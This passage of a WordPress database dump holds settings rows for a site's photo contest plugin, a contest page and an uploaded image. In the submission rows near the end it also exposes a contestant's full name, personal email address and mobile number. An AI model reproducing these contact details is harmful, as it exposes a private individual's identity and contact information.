r\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\",\"enabled\":true}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\",\"seo\":{\"contest\":{\"description\":\"\"}}}','A','','inherit','closed','closed','','787-revision-v1','','','2022-02-09 13:09:25','2022-02-09 07:39:25','',787,'https://mangomitra.in/?p=892',0,'revision','',0),(900,1,'2022-02-09 13:41:25','2022-02-09 08:11:25','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"49a0b086-30fd-490c-be13-c018891d5207\",\"type\":\"text\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":false,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true},{\"id\":\"prizes\",\"title\":\"Prizes\",\"content\":\"\",\"collapsed\":false}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#209610\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#239913\",\"secondary\":\"#3eb538\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"7d5cf490966639d247a5458ac12bec7f\"}','Photo Contest','','publish','closed','closed','','photo-contest','','','2022-02-25 16:16:47','2022-02-25 10:46:47','',0,'https://mangomitra.in/?post_type=contest&#038;p=900',0,'contest','',0),(901,1,'2022-02-09 13:41:25','2022-02-09 08:11:25','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"e2800e39-e84b-445f-b23e-69e6509adbd3\",\"type\":\"number\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-09 13:41:25','2022-02-09 08:11:25','',900,'https://mangomitra.in/?p=901',0,'revision','',0),(902,1,'2022-02-09 13:44:08','2022-02-09 08:14:08','<!-- wp:shortcode -->\n[totalcontest contest=\"900\"]\n<!-- /wp:shortcode -->','Contest','','publish','closed','closed','','contest-3','','','2022-02-09 15:27:23','2022-02-09 09:57:23','',0,'https://mangomitra.in/?page_id=902',0,'page','',0),(903,1,'2022-02-09 13:44:08','2022-02-09 08:14:08','<!-- wp:shortcode -->\n[totalcontest contest=\"900\"]\n<!-- /wp:shortcode -->','CONTEST','','inherit','closed','closed','','902-revision-v1','','','2022-02-09 13:44:08','2022-02-09 08:14:08','',902,'https://mangomitra.in/?p=903',0,'revision','',0),(904,1,'2022-02-09 13:45:00','2022-02-09 08:15:00','','download-1-1','','inherit','open','closed','','download-1-1','','','2022-02-09 13:45:00','2022-02-09 08:15:00','',905,'/storage/v6964/mangomitra/public_html/wp-content/uploads/2022/02/download-1-1.jfif',0,'attachment','image/jpeg',0),(905,1,'2022-02-09 13:45:00','2022-02-09 08:15:00','{\"fields\":{\"field\":\"Nimya Jose\",\"field_copy\":\"nimyajose10@gmail.com\",\"field_copy_copy\":\"9497674907\",\"field_copy_copy_copy\":904,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":{\"field_copy_copy_copy\":{\"type\":\"attachment\",\"attachment\":{\"id\":904,\"type\":\"image\",\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1.jfif\"},\"thumbnail\":{\"id\":904,\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1-150x150.jfif\"},\"preview\":\"[totalcontest-image id=\\\"904\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1-150x150.jfif\\\"]\",\"content\":\"[totalcontest-image id=\\\"904\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1.jfif\\\"]\"}},\"token\":\"8e4c54d8-b2bb-4352-91ed-dd085a2a4a07\",\"meta\":{\"schema\":\"1.0\"}}','Submission 905','','publish','closed','closed','','905','','','2022-02-09 13:45:00','2022-02-09 08:15:00','',900,'https://mangomitra.in/contest/photo-contest/submission/905/',0,'contest_submission','',0),(906,1,'2022-02-09 13:45:00','2022-02-09 08:15:00','{\"fields\":{\"field\":\"Nimya Jose\",\"field_copy\":\"nimyajose10@gmail.com\",\"field_copy_copy\":\"9497674907\",\"field_copy_copy_copy\":904,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":{\"field_copy_copy_copy\":{\"type\":\"attachment\",\"attachment\":{\"id\":904,\"type\":\"image\",\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1.jfif\"},\"thumbnail\":{\"id\":904,\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1-150x150.jfif\"},\"preview\":\"[totalcontest-image id=\\\"904\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1-150x150.jfif\\\"]\",\"content\":\"[totalcontest-image id=\\\"904\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/download-1-1.jfif\\\"]\"}},\"token\":\"8e4c54d8-b2bb-4352-91ed-dd085a2a4a07\",\"meta\":{\"schema\":\"1.0\"}}','Submission 905','','inherit','closed','closed','','905-revision-v1','','','2022-02-09 13:45:00','2022-02-09 08:15:00','',905,'https://mangomitra.in/?p=906',0,'revision','',0),(908,1,'2022-02-09 13:50:15','2022-02-09 08:20:15',' ','','','publish','closed','closed','','908','','','2022-02-09 13:50:15','2022-02-09 08:20:15','',0,'https://mangomitra.in/2022/02/09/908/',2,'nav_menu_item','',0),(909,1,'2022-02-09 14:28:38','2022-02-09 